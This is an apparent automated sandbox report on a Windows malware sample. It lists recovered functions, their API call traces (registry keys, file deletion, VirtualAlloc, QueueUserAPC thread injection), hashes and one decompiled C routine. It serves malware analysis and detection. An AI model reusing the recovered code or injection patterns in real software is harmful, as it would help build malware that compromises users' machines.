                                                              • Part of subcall function 04571573: lstrlenW.KERNEL32(00000000,00000000,?,04582B68,00000000,?,?,?,04566C27), ref: 04571586
                                                              • Part of subcall function 04571573: lstrlen.KERNEL32(04582B68,?,04582B68,00000000,?,?,?,04566C27), ref: 04571591
                                                              • Part of subcall function 04571573: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 045715A6
                                                            • RegCloseKey.ADVAPI32(04566C27,?,04566C27,00000000,?,?,?,04566C27), ref: 04582BB3
                                                              • Part of subcall function 0456A20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04581C44,?,73B74D40), ref: 0456A21A
                                                              • Part of subcall function 0456A20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04581C44,?,73B74D40), ref: 0456A242
                                                              • Part of subcall function 0456A20E: memset.NTDLL ref: 0456A254
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,04566C27), ref: 04582BE8
                                                            • GetLastError.KERNEL32(?,?,04566C27), ref: 04582BF3
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04566C27), ref: 04582C09
                                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,04566C27), ref: 04582C1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1430934453-0
                                                            • Opcode ID: 98436f5ff2e1a59b4a4faa9e292150ea3d6cc4445bd27265db1cccba2dad71f7
                                                            • Instruction ID: 9d5e65f782ed7acf31418b7d8501398e5488f8a51cbf55fd33f8e79a3ee28644
                                                            • Opcode Fuzzy Hash: 98436f5ff2e1a59b4a4faa9e292150ea3d6cc4445bd27265db1cccba2dad71f7
                                                            • Instruction Fuzzy Hash: DF51297190110AEBEB11AFA0DC44EAE7BB8FB84315F1045A9F901F3250DF39EE05AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456BCAC, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0456BCE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0456BCF7
                                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0456BD1F
                                                            • HeapFree.KERNEL32(00000000,00000001), ref: 0456BD60
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456BD70
                                                            • RtlAllocateHeap.NTDLL(00000000,04566562), ref: 0456BD83
                                                            • RtlAllocateHeap.NTDLL(00000000,04566562), ref: 0456BD92
                                                            • HeapFree.KERNEL32(00000000,?,?,04566562,?,00000001,?,?), ref: 0456BDDC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE00
                                                            • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE25
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE3A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CloseCreate
                                                            • String ID:
                                                            • API String ID: 4126010716-0
                                                            • Opcode ID: 7833fe18b5d937c8297f6d4db498d8f62b498ab3a15b9657869b35168112fc5c
                                                            • Instruction ID: c0804aa7cf4ae9def0490188356fde921c61a35200a3b0b5784f44b5621efbd1
                                                            • Opcode Fuzzy Hash: 7833fe18b5d937c8297f6d4db498d8f62b498ab3a15b9657869b35168112fc5c
                                                            • Instruction Fuzzy Hash: 7851C2B580011AEFDF119F95E8809EEBBB9FB08344F10446AF615B6211DB35AE94EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04573430, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 0457344A
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04573460
                                                            • lstrlenW.KERNEL32(00000000), ref: 045734A3
                                                            • RtlAllocateHeap.NTDLL(00000000,04584AA2), ref: 045734B9
                                                            • memcpy.NTDLL(00000000,00000000,04584AA0), ref: 045734CC
                                                            • _wcsupr.NTDLL ref: 045734D7
                                                            • lstrlenW.KERNEL32(?,04584AA0), ref: 04573510
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04584AA0), ref: 04573525
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0457353B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04573560
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457356F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 3868788785-0
                                                            • Opcode ID: 4eb0eed57cdc2930f19677b3ad573d85781c35cdfd5a444edfe50fde29c51a4d
                                                            • Instruction ID: 57b728a35d2354eeef984fe0976c60e91274d478aeb23ca10ead3ab951a6606f
                                                            • Opcode Fuzzy Hash: 4eb0eed57cdc2930f19677b3ad573d85781c35cdfd5a444edfe50fde29c51a4d
                                                            • Instruction Fuzzy Hash: 0E31BD32500205EBC7215FA8BC8896F7BA9FB85720B15463DF911E2181DF79BC48FB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3D9E, Relevance: 16.6, APIs: 11, Instructions: 112stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E00DD3D9E(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0xdda38c; // 0x39c9c08
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00DD6AF5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xdd91ac;
				}
				_t46 = E00DD5D9A(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00DD77D7(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xdda2d4; // 0x2bed5a8
						_t16 = _t75 + 0xddbab8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00DD6AF5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xdd91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00DD77D7(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00DD77EC(_v20);
						} else {
							_t66 =  *0xdda2d4; // 0x2bed5a8
							_t31 = _t66 + 0xddbbd8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00DD77EC(_v12);
				}
				return _v24;
			}




























                                                            0x00dd3da6
                                                            0x00dd3dac
                                                            0x00dd3db3
                                                            0x00dd3db9
                                                            0x00dd3dbd
                                                            0x00dd3dc1
                                                            0x00dd3dc4
                                                            0x00dd3dcb
                                                            0x00dd3dce
                                                            0x00dd3dd0
                                                            0x00dd3dd0
                                                            0x00dd3dd9
                                                            0x00dd3de0
                                                            0x00dd3de3
                                                            0x00dd3de9
                                                            0x00dd3df3
                                                            0x00dd3dfc
                                                            0x00dd3e03
                                                            0x00dd3e1c
                                                            0x00dd3e23
                                                            0x00dd3e26
                                                            0x00dd3e2f
                                                            0x00dd3e38
                                                            0x00dd3e49
                                                            0x00dd3e52
                                                            0x00dd3e56
                                                            0x00dd3e5a
                                                            0x00dd3e61
                                                            0x00dd3e64
                                                            0x00dd3e66
                                                            0x00dd3e66
                                                            0x00dd3e70
                                                            0x00dd3e79
                                                            0x00dd3e80
                                                            0x00dd3e98
                                                            0x00dd3e9c
                                                            0x00dd3ed9
                                                            0x00dd3e9e
                                                            0x00dd3ea1
                                                            0x00dd3ea9
                                                            0x00dd3eba
                                                            0x00dd3ec6
                                                            0x00dd3ece
                                                            0x00dd3ed2
                                                            0x00dd3ed2
                                                            0x00dd3e9c
                                                            0x00dd3ee1
                                                            0x00dd3ee6
                                                            0x00dd3eed

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00DD3DB3
                                                            • lstrlen.KERNEL32(?,80000002,00000005), ref: 00DD3DF3
                                                            • lstrlen.KERNEL32(00000000), ref: 00DD3DFC
                                                            • lstrlen.KERNEL32(00000000), ref: 00DD3E03
                                                            • lstrlenW.KERNEL32(80000002), ref: 00DD3E10
                                                            • wsprintfW.USER32 ref: 00DD3E49
                                                            • lstrlen.KERNEL32(?,00000004), ref: 00DD3E70
                                                            • lstrlen.KERNEL32(?), ref: 00DD3E79
                                                            • lstrlen.KERNEL32(?), ref: 00DD3E80
                                                            • lstrlenW.KERNEL32(?), ref: 00DD3E87
                                                            • wsprintfW.USER32 ref: 00DD3EBA
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                            • String ID:
                                                            • API String ID: 822878831-0
                                                            • Opcode ID: 063ac661433d3a0db4bd04c384377e8cbc41035b3b88452a8c8055a541a84f3b
                                                            • Instruction ID: 7f574c540627922d6fd5f870b64e893e4947f16d33f20a11637a7dba5a5d9284
                                                            • Opcode Fuzzy Hash: 063ac661433d3a0db4bd04c384377e8cbc41035b3b88452a8c8055a541a84f3b
                                                            • Instruction Fuzzy Hash: 9B414972900219FBCF11AFA8DD09A9EBBB5EF48314F054092FD04A7361D7369A15EBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581297, Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 045812BB
                                                              • Part of subcall function 0457B801: RegCloseKey.ADVAPI32(?,04566C27), ref: 0457B888
                                                            • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,04566C27), ref: 045812EA
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04566C27), ref: 045812FB
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04581335
                                                            • RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004,?,?,04566C27), ref: 04581357
                                                            • RegCloseKey.ADVAPI32(?,?,?,04566C27), ref: 04581360
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04581376
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04566C27), ref: 0458138B
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0458139F
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04566C27), ref: 045813B4
                                                            • RegCloseKey.ADVAPI32(?,?,?,04566C27), ref: 045813BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                            • String ID:
                                                            • API String ID: 534682438-0
                                                            • Opcode ID: 51034bdcb76ceee0605aa81751a80f1e7b1a1a82cf770c2992a3caea96fe2b9f
                                                            • Instruction ID: b4546aaf90d207d84888b6de3bf99486e3270e2f1febcc8b4515eabbe4be7590
                                                            • Opcode Fuzzy Hash: 51034bdcb76ceee0605aa81751a80f1e7b1a1a82cf770c2992a3caea96fe2b9f
                                                            • Instruction Fuzzy Hash: CA313771900508EFDB12AFA4EC88CAE7BB9FB49301B104159F546F2121DF39AE49FB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04566B10, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04566B27
                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566B39
                                                            • StrChrA.SHLWAPI(00000000,0000003A,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566B46
                                                            • wsprintfA.USER32 ref: 04566B61
                                                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000094), ref: 04566B77
                                                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04566B90
                                                            • WriteFile.KERNEL32(00000000,00000000), ref: 04566B98
                                                            • GetLastError.KERNEL32 ref: 04566BA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 04566BAF
                                                            • GetLastError.KERNEL32(?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?,00000094), ref: 04566BC0
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566BD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                            • String ID:
                                                            • API String ID: 3873609385-0
                                                            • Opcode ID: 1c95b17e2d8ff05b841e28ae6432d0a3439d3f86a8e76e479d91dcec70dc1b26
                                                            • Instruction ID: 8aa48f99c775f895a55a1cd032e4da0aaa4d6f3643518a5d9d1e7cb03f055744
                                                            • Opcode Fuzzy Hash: 1c95b17e2d8ff05b841e28ae6432d0a3439d3f86a8e76e479d91dcec70dc1b26
                                                            • Instruction Fuzzy Hash: 9011A271201214FFD3216B25AC8CF7B3B6CFB413A5F001129F906E6180EE296D09F6B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045754DA, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04575551
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04575570
                                                              • Part of subcall function 0456B7B9: wsprintfA.USER32 ref: 0456B7CC
                                                              • Part of subcall function 0456B7B9: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0456B7DE
                                                              • Part of subcall function 0456B7B9: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0456B808
                                                              • Part of subcall function 0456B7B9: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456B81B
                                                              • Part of subcall function 0456B7B9: CloseHandle.KERNEL32(?), ref: 0456B824
                                                            • GetLastError.KERNEL32 ref: 04575843
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04575853
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04575864
                                                            • RtlExitUserThread.NTDLL(?), ref: 04575872
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                            • String ID:
                                                            • API String ID: 1258333524-0
                                                            • Opcode ID: 665afd8cbad7946f41b54d04876d92e04fa094bb375a434a10351f5706090ede
                                                            • Instruction ID: efde9851e78d033f32076ace2183949bcf34b50a231d4deb7e38186fcdab9fd7
                                                            • Opcode Fuzzy Hash: 665afd8cbad7946f41b54d04876d92e04fa094bb375a434a10351f5706090ede
                                                            • Instruction Fuzzy Hash: F6B14AB1500209EFEB209F21EC84AAA7BB9FF08345F204539FA1AD6551FB34E845EF11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581D93, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(049BBA30,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DB6
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DC5
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DD2
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04581DEA
                                                            • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04581DF6
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04581E12
                                                            • wsprintfA.USER32 ref: 04581EF4
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04581F41
                                                            • InterlockedExchange.KERNEL32(0458C0BC,00000000), ref: 04581F5F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04581FA0
                                                              • Part of subcall function 045624CF: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                              • Part of subcall function 045624CF: memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                              • Part of subcall function 045624CF: RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                              • Part of subcall function 045624CF: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                              • Part of subcall function 045624CF: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                            • String ID:
                                                            • API String ID: 4198405257-0
                                                            • Opcode ID: 3881687c5740a8ea375691a0c3a49918dc15a2d0425c87099d7d058de182462e
                                                            • Instruction ID: b39bee1d21a9a9cba15e02a369a456fc3f72f43a7e49c43ab3a6718af55764f8
                                                            • Opcode Fuzzy Hash: 3881687c5740a8ea375691a0c3a49918dc15a2d0425c87099d7d058de182462e
                                                            • Instruction Fuzzy Hash: 2E616D71A0020AEFCB11DFA5D884EAE3BB9FB44344F04456DF905B7250DF78A949EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04579AD2, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045687FC: memset.NTDLL ref: 0456881E
                                                              • Part of subcall function 045687FC: CloseHandle.KERNEL32(?,?,?,?,?), ref: 045688C8
                                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04579B19
                                                            • CloseHandle.KERNEL32(?), ref: 04579B25
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04579B35
                                                            • lstrlenW.KERNEL32(00000000), ref: 04579B3F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04579B50
                                                            • wcstombs.NTDLL ref: 04579B61
                                                            • lstrlen.KERNEL32(?), ref: 04579B6E
                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 04579BA4
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04579BB6
                                                            • DeleteFileW.KERNEL32(?), ref: 04579BC4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                            • String ID:
                                                            • API String ID: 2256351002-0
                                                            • Opcode ID: 3c163a6687c026efd4f454fa04b27fa672980d2ef18195edd66bfa454796b3b3
                                                            • Instruction ID: 13dd7116c2f9eaabd335ebab4851c1b4d4afc09891e81ff39d3ac1bab20c91ec
                                                            • Opcode Fuzzy Hash: 3c163a6687c026efd4f454fa04b27fa672980d2ef18195edd66bfa454796b3b3
                                                            • Instruction Fuzzy Hash: 19313A7180011AEFDF11AFA5E988CAE7F79FF45305F004069F905B2151DB39AE55EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456DD60, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0456DD70
                                                            • CreateFileW.KERNEL32(04561DEA,80000000,00000003,0458C1A8,00000003,00000000,00000000,?,04561DEA,?), ref: 0456DD8D
                                                            • GetLastError.KERNEL32(?,04561DEA,?), ref: 0456DE35
                                                              • Part of subcall function 0456AB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 0456ABBE
                                                              • Part of subcall function 0456AB88: lstrcpy.KERNEL32(00000000,00000000), ref: 0456ABE2
                                                              • Part of subcall function 0456AB88: lstrcat.KERNEL32(00000000,00000000), ref: 0456ABEA
                                                            • GetFileSize.KERNEL32(04561DEA,00000000,?,00000001,?,04561DEA,?), ref: 0456DDC0
                                                            • CreateFileMappingA.KERNEL32(04561DEA,0458C1A8,00000002,00000000,00000000,04561DEA), ref: 0456DDD4
                                                            • lstrlen.KERNEL32(04561DEA,?,04561DEA,?), ref: 0456DDF0
                                                            • lstrcpy.KERNEL32(?,04561DEA), ref: 0456DE00
                                                            • GetLastError.KERNEL32(?,04561DEA,?), ref: 0456DE08
                                                            • HeapFree.KERNEL32(00000000,04561DEA,?,04561DEA,?), ref: 0456DE1B
                                                            • CloseHandle.KERNEL32(04561DEA,?,00000001,?,04561DEA), ref: 0456DE2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                            • String ID:
                                                            • API String ID: 194907169-0
                                                            • Opcode ID: 59f5bb6f10fdfdfc526f23a8d058f12e9fa8dd28cdf433a6b4d802ed004fbddb
                                                            • Instruction ID: cf8a0f4f952d4d9718a754efd65357fba4bb4fcc847f130cfe3b9fa460f7bb0e
                                                            • Opcode Fuzzy Hash: 59f5bb6f10fdfdfc526f23a8d058f12e9fa8dd28cdf433a6b4d802ed004fbddb
                                                            • Instruction Fuzzy Hash: C921FC71900208FFDB119FA5D888A9EBFB9FB04355F108469F506E6250DB759E48EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457AE65, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457AE8B
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0457AE97
                                                            • GetModuleHandleA.KERNEL32(?,049B9732,?,00000000,00000000), ref: 0457AEB7
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0457AEBE
                                                            • Thread32First.KERNEL32(00000001,0000001C), ref: 0457AECE
                                                            • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 0457AEE9
                                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0457AEFA
                                                            • CloseHandle.KERNEL32(00000000), ref: 0457AF01
                                                            • Thread32Next.KERNEL32(00000001,0000001C), ref: 0457AF0A
                                                            • CloseHandle.KERNEL32(00000001), ref: 0457AF16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                            • String ID:
                                                            • API String ID: 2341152533-0
                                                            • Opcode ID: dc875a0f29311dc3c0d666eda68321579a212fcfbfe14a4513526837620cc4b2
                                                            • Instruction ID: 84e2a05b1084d261c9f59d95da10ba875c2fe40f233a0c42ca3cd59515de1784
                                                            • Opcode Fuzzy Hash: dc875a0f29311dc3c0d666eda68321579a212fcfbfe14a4513526837620cc4b2
                                                            • Instruction Fuzzy Hash: 05213DB2900119EFDF01AFA0EC88DAE7B79FB48355B00412AFA01B7150DB35AD45ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045742B4, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,0456E0E1), ref: 045742C9
                                                              • Part of subcall function 045670E1: InterlockedExchange.KERNEL32(?,000000FF), ref: 045670E8
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0456E0E1), ref: 045742E9
                                                            • CloseHandle.KERNEL32(00000000,?,0456E0E1), ref: 045742F2
                                                            • CloseHandle.KERNEL32(?,?,?,0456E0E1), ref: 045742FC
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04574304
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0457431C
                                                            • Sleep.KERNEL32(000001F4), ref: 0457432B
                                                            • CloseHandle.KERNEL32(?), ref: 04574338
                                                            • LocalFree.KERNEL32(?), ref: 04574343
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 0457434D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 1408595562-0
                                                            • Opcode ID: b9007a084d4c8147ec915ab7050f8603cc6249577cb4cbb806a5421c258d31a4
                                                            • Instruction ID: b47aa9b5298d9110b0fc479634d6600896075defa884295e3a05989ab64bf6bb
                                                            • Opcode Fuzzy Hash: b9007a084d4c8147ec915ab7050f8603cc6249577cb4cbb806a5421c258d31a4
                                                            • Instruction Fuzzy Hash: CC114C75200616EFDB206B75F848A5AB7B8FF057157541928E196A3510CF3AF884AB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045691D3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 045691EE
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 045692A6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04569255
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04569274
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 04569286
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0456928E
                                                            Strings
                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 045691DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
